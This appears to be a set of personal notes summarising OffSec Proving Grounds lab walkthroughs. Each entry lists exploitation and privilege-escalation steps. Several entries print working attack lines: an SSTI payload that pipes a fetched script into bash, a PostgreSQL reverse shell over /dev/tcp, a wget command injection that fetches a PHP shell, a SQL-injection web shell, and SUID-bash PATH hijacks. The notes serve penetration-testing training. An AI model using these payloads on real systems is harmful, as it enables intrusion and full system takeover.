Good articles

[WDavid404]

Reconstruction (Linux, 2020)

[WDavid404]

Rookie Mistake (Linux, 2022)

https://al1z4deh.medium.com/proving-grounds-rookie-mistake-b74eca98edf1 https://medium.com/@Dpsypher/proving-grounds-practice-rookie-mistake-79e474449af3

• crack JTW secret hash and found "username" can execute command JWT crack using john tool --> need to use the entire content of JWT
• found the username can execute command (Note: exp must be longer than current time)

--> so we can try to run reverse shell command {{ config.__class__.from_envvar.__globals__.import_string('os').popen('curl 192.168.45.160/rev.sh | bash').read() }} and make the malicious rev.sh

Refer: SSTI (https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection)

• [PE] pidstat (https://gtfobins.github.io/gtfobins/pidstat/)

[WDavid404]

Roquefort (Linux, 2020)

• Gitea 1.7.5 - Remote Code Execution (https://www.exploit-db.com/exploits/49383) --> need an account --> registry one --> created a new repo and edit Git Hook to add shell command (e.g. cat /etc/passwd) --> upload a ssh private key for a user --> SSH login
• [PE]we have write access to /usr/local/bin directory and there is a run-parts processs is running by root. and The run-parts binary is on /bin. /usr/local/bin is on upper priority. Technically we can create a malicious run-parts binary on /usr/local/bin and it will get executed as root.

  
  echo "chmod +s /bin/bash" > /usr/local/bin/run-parts
  chmod +x /usr/local/bin/run-parts

[WDavid404]

Scarlet (Linux, 2022)

[WDavid404]

Scrutiny (Linux, 2024)

https://medium.com/@4HM7H3X/oscp-prep-pg-practice-walkthrough-scrutiny-839baf7f8077

TeamCity version 2023.05.4 is vulnerable to an Authentication Bypass vulnerability (CVE-2024–27198) After creating a new user we find an id_rsa key belonging to another user within the site. We convert the key into its hash crack it and establish a connection. Upon checking emails we discover the password of another user. Using this password found on the desktop of the obtained user we escalate privileges using systemctl

[WDavid404]

Serialrunning (Linux, 2024)

[WDavid404]

Shiftdel (Linux, 2021)

https://medium.com/@ardian.danny/oscp-practice-series-40-proving-grounds-shiftdel-abf4803b1bfd

• searchsploit WordPress 4.9.6 --> Accessing $IP/?static=1&order=asc --> Got user password info
• Exploit: Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) because we cann't access /wp-config.php --> try deleting the ‘.htaccess’ file by running unlink_thumb("../../../../.htaccess") --> so that we can read /wp-config.php and get database credentials --> use this information to login on the PHPMyAdmin page --> get version information v4.8.1 --> found exploit: phpMyAdmin 4.8.1 - Remote Code Execution (RCE) (https://www.exploit-db.com/exploits/50457)
• [PE] pspy--> The question remains: where is this ‘.’ directory? --> it’s from the ‘wpclean’ cron script and the script cleans non-image files from the /var/www/html/wordpress/wp-content/uploads folder. Since the HOME variable is set to /var/www/html/wordpress/wp-content/uploads, we can create a malicious binary there to perform PATH privilege escalation. Additionally, we observe that ‘rm’ didn’t use an absolute path, so we technically could inject it.

  
  cd /var/www/html/wordpress/wp-content/uploads
  mkdir bin
  cd bin
  echo "chmod +s /bin/bash" > rm
  chmod 777 rm

[WDavid404]

The following boxes are very simple ...

Snookums (Linux, 2020)

https://medium.com/@0xrave/snookums-proving-ground-practice-walkthrough-0a8937c6aa2f

Sona (Linux, 2021)

https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-sona-f6797b9cc935

sorcerer (Linux, 2020)

https://medium.com/@jserna4510/sorcerer-pg-walkthrough-6e9c403f4896

[WDavid404]

Source (Linux, 2022)

[WDavid404]

Spaghetti (Linux, 2021)

https://al1z4deh.medium.com/proving-grounds-spaghetti-4ba123427b54

keypoints： IRC （6667）

[WDavid404]

Splodge (Linux, 2020)

https://medium.com/@0xrave/splodge-proving-grounds-practice-walkthrough-2f30156e4b97

• git checkout command is used to switch between different branches or to restore working tree files. Get the hash from git log, git checkout $Hash and we got a lot of php file, which got deleted. To restore the file, git checkout -- .
• Look for password： find ~/Your/Dir/dest-dir/ -maxdepth 5 -name "*.php" -exec grep -Hni "password" {} \; 2>/dev/null
• Use preg_replace() PHP Function Exploit | RCE

  #the pat refer to pattern, rep refer to replace, sub seems not relevant to our case
  payload : index.php?pat=/a/e&rep=phpinfo();&sub=abc

  

• 【PE】discover the postgreSQL username password in env variables --》 login postgreSQL --> Execute command in PostgreSQL (By checking hacktrick, we can use COPY query to lead us to command execution.)

  #POC
  DROP TABLE IF EXISTS cmd_exec;
  CREATE TABLE cmd_exec(cmd_output text);
  COPY cmd_exec FROM PROGRAM 'id';
  SELECT * FROM cmd_exec;
  DROP TABLE IF EXISTS cmd_exec;
  #Get reverse shell
  COPY cmd_exec FROM PROGRAM 'sh -i >& /dev/tcp/$KaliIP/8080 0>&1';

[WDavid404]

Surf (Linux, 2021)

[WDavid404]

Sybaris (Linux, 2021)

https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-sybaris-491b23545014

• bruteforce FTP

• Remote code execution exploit for Redis 5.x (https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) and upload "module.so" to FTP --> use redis-client to import the module assuming the shared ftp folder is at the default location and it works.

• [PE] CVE-2021–4034 --> exploit

[WDavid404]

Symboli (Windows, 2022)

https://medium.com/@ardian.danny/oscp-practice-series-30-proving-grounds-symbolic-2afdae158ea5

Key points:

• This website provide a feature to convert HTML file to PDF --> SSRF --> username: p4yl0ad

• Upload a php file to read config file and user's SSH key --> didn't work. so try /Users/p4yl0ad/.ssh/id_rsa

• [PE] C:/backup.ps1 file which backing up the C:\xampp\htdocs\logs\request.log file to the C:\backup\logs directory ---> if we create a symbolic link, that links request.log to some admin file like their OpenSSH private_key, then run the backup.ps1 again. Then, we should be able to see the private key through the logs backup ---> but we can’t use mlink...

finally --> Use CreateSymlink.exe tool

To do this without administrator rights, we need to create a Mount Point such that C:\xampp\htdocs\ points to \RPC Control\ object directory. We then create a Symlink such that \RPC Control\logs points to \?\C:\Users\Administrator.ssh\id_rsa.

We can do this by using [symboliclink-testing-tools](https://github.com/googleprojectzero/symboliclink-testing-tools/releases/download/v1.0/Release.7z), a tool for testing various symbolic link types of Windows. We need to save the 7zip file to our Kali machine and the unzip it.

[WDavid404]

UC404 (Linux, 2020)

https://kashz.gitbook.io/proving-grounds-writeups/pg-boxes/uc404

• sendmail.php has command injection issue --> email=||+id upload a reverse php file

  
  # we have code execution
  email=||wget+192.168.49.136/web.php

http://192.168.136.109/under_construction/web.php

--> we will have shell

- [PE] sudo -l --> /usr/bin/git  --> https://gtfobins.github.io/gtfobins/git/#sudo

TF=$(mktemp -d) ln -s /bin/sh "$TF/git-x" sudo git "--exec-path=$TF" x

[WDavid404]

Validator (Linux, 2023)

https://medium.com/@joemcfarland/hack-the-box-validation-writeup-de4372269cdf

• SQL injection username=shell&country=United+Kingdom' union select "<?php SYSTEM($_REQUEST['cmd']) ?>" INTO OUTFILE '/var/www/html/shell.php'-- -, then visited ‘http://10.129.234.49/shell.php?cmd=id’
• [PE] config.php -> found credential and can acess root dir

[WDavid404]

Vanity (Linux, 2022)

https://al1z4deh.medium.com/proving-grounds-vanity-ce128d6e504

• rsync (873)

  
  └─$ rsync  -rdt rsync://192.168.54.234                        
  source          Web Source
  backup          Virus Samples Backup

Copy the shared folders.

└─$ rsync -rdt rsync://192.168.54.234/source .

Found the system function is used in source code --> use this to do command injection.
![image](https://github.com/user-attachments/assets/445e3774-1338-4244-b476-fa1dff9ff416)
use reverse shell command (encoded)
![image](https://github.com/user-attachments/assets/a67926a3-4e5d-44b4-bbf1-cd707dae5bf5)
- [PE]
![image](https://github.com/user-attachments/assets/a8baefdd-f2b2-4735-9cc8-40efd4c0e443)
![image](https://github.com/user-attachments/assets/457919f0-f2e6-4182-8d33-105068c7b954)
We see that this setting can be abused to achieve RCE.
![image](https://github.com/user-attachments/assets/eb47899b-2b9b-4787-bdef-826bdebde976)
---> prepare our payload
![image](https://github.com/user-attachments/assets/9df78395-f583-474d-8822-7b737e856aa4)

[WDavid404]

VoIP (Linux, 2021)

https://medium.com/@thetraphacker/proving-grounds-pg-voip-writeup-83d6da0f2874

• using sipdigestleak from the sippts framework, I got password hash for user adm_sip:

  
  root@kali:/home/kali/offsec/GIT/sippts# python3 sipdigestleak.py -i $ip  
  ☎  SIPPTS BY 🅿 🅴 🅿 🅴 🅻 🆄 🆇
  █████████████████████████████████▀█████████████████████████████████████████████
  █─▄▄▄▄█▄─▄█▄─▄▄─███▄─▄▄▀█▄─▄█─▄▄▄▄█▄─▄▄─█─▄▄▄▄█─▄─▄─███▄─▄███▄─▄▄─██▀▄─██▄─█─▄█
  █▄▄▄▄─██─███─▄▄▄████─██─██─██─██▄─██─▄█▀█▄▄▄▄─███─██████─██▀██─▄█▀██─▀─███─▄▀██
  ▀▄▄▄▄▄▀▄▄▄▀▄▄▄▀▀▀▀▀▄▄▄▄▀▀▄▄▄▀▄▄▄▄▄▀▄▄▄▄▄▀▄▄▄▄▄▀▀▄▄▄▀▀▀▀▄▄▄▄▄▀▄▄▄▄▄▀▄▄▀▄▄▀▄▄▀▄▄▀

💾 https://github.com/Pepelux/sippts 🐦 https://twitter.com/pepeluxx Press Ctrl+C to stop [✓] Target: 192.168.175.156:5060/UDP [=>] Request INVITE [<=] Response 180 Ringing [<=] Response 200 OK [=>] Request ACK ... waiting for BYE ... [<=] Received BYE [=>] Request 407 Proxy Authentication Required [<=] Received BYE [=>] Request 200 Ok Auth=Digest username="adm_sip", uri="sip:127.0.0.1:5060", password="074b62fb6c21b84e6b5846e6bb001f67", algorithm=MD5

| IP address | Port | Proto | Response |

| 192.168.175.156 | 5060 | UDP | Digest username="adm_sip", uri="sip:127.0.0.1:5060", password="074b62fb6c21b84e6b5846e6bb001f67", algorithm=MD5 |

- a tool called ‘sox’ --> decrypt raw data
`sox -t raw -r 8000 -v 4 -c 1 -e mu-law 2138.raw out.wav`
--> The resulting wav file is a recording of a call, where one says the following: "Your Password has been changed to Password1234 where P is capital"

[WDavid404]

Walla (Linux, 2021)

https://z4c777.medium.com/walla-offsec-pg-practice-walkthrough-e97c036e778a

Not complicate

XposedAPI (Linux, 2021)

https://medium.com/@malwarejoe/xposedapi-offsec-proving-grounds-lab-write-up-3848be2c61d3

• WAF bypass via adding an ‘X-Forwarded-For: 127.0.0.1’ HTTP header that enabled access to the restricted /logs API endpoint.
• LFI in the file parameter for the /logs API endpoint that allowed me to review the API source code.
• RCE via OS Code Injection into a JSON payload’s URL value.

ZenPhoto (Linux, 2020)

https://medium.com/@thetraphacker/proving-grounds-pg-zenphoto-writeup-8cd8218d9b26

Zino (Linux, 2020)

https://medium.com/@thetraphacker/proving-grounds-pg-zenphoto-writeup-4b901dc45607

[WDavid404]

Craft (Intermediate, Windows, 2021)

https://www.youtube.com/watch?v=0Am8mzOXTVk

Key points:

• made a malicious odf file that runs shell command
• made a cmd.php in C:/xampp/hotdocs/ --> it is run on web service as apache user who has SeImpersonatePrivilege enabled.